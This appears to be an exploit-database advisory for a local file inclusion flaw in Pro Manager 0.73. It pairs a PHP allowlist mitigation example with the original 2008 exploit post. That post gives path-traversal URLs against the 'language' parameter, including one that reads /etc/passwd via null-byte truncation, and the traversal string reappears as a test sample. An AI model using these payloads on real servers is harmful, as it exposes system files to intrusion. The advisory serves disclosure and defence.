Vendor: Pro Manager
By: Stack
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: Pro Manager
Affected Version From: 0.73
Affected Version To: 0.73
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pro Manager 0.73 Local File Inclusion Vulnerability

An attacker can exploit this vulnerability by sending an HTTP request with a crafted 'language' parameter to the vulnerable application. This allows the attacker to read arbitrary files on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
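
One way to apply this to a 'language' parameter, shown as an added example that is not Pro Manager's code. The language directory layout, the "<name>.php" file naming and the function name resolve_language_file are assumptions; the sample values in the demo are constructed.

```php
<?php
// Added example, not Pro Manager code. Directory layout, file naming
// ("<name>.php") and the function name are assumptions.

function resolve_language_file($requested, string $langDir, string $default = 'english'): string
{
    $base = realpath($langDir);
    if ($base === false) {
        throw new RuntimeException('language directory not found');
    }

    // Allowlist: only files that actually exist in the language directory.
    $allowed = [];
    foreach (glob($base . DIRECTORY_SEPARATOR . '*.php') ?: [] as $file) {
        $allowed[basename($file, '.php')] = $file;
    }

    // Non-string input (e.g. language[]=x) and anything outside a strict
    // character set (dots, slashes, NUL bytes) falls back to the default.
    if (!is_string($requested) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)
        || !isset($allowed[$requested])) {
        $requested = $default;
    }
    if (!isset($allowed[$requested])) {
        throw new RuntimeException('default language file missing');
    }

    // Defence in depth: the resolved path must stay under the base directory
    // (catches a symlink planted inside the language directory).
    $path = realpath($allowed[$requested]);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file escapes language directory');
    }
    return $path;
}

// Constructed demo: a temporary language directory and sample parameter values.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/english.php", '<?php $lang = "en";');
file_put_contents("$dir/french.php", '<?php $lang = "fr";');

$samples = ['french', '../../../../etc/passwd' . "\0", 'english/../french', ['x']];
foreach ($samples as $value) {
    echo json_encode($value), ' => ', basename(resolve_language_file($value, $dir)), PHP_EOL;
}
// In the application the returned path would be passed to require/include.
```

Only the first sample resolves to french.php; the other three fall back to english.php because the value never reaches the filesystem unless it matches an existing language name.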
Source

Exploit-DB raw data:

--------------------------------------
Pro Manager 0.73 Local File Inclusion Vuln
--------------------------------------
http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz
--------------------------------------
By : Stack

email : Wanted
--------------------------------------
Exploit :
http://localhost/path/inc/config.php?language=../../../../[without php extention]
http://localhost/path/inc/config.php?language=../../../../etc/passwd%00
--------------------------------------
thnx allah
Greats to all arabians haxors :d
D-S.Morocco Is The Best :d
Waiting 

# milw0rm.com [2008-06-09]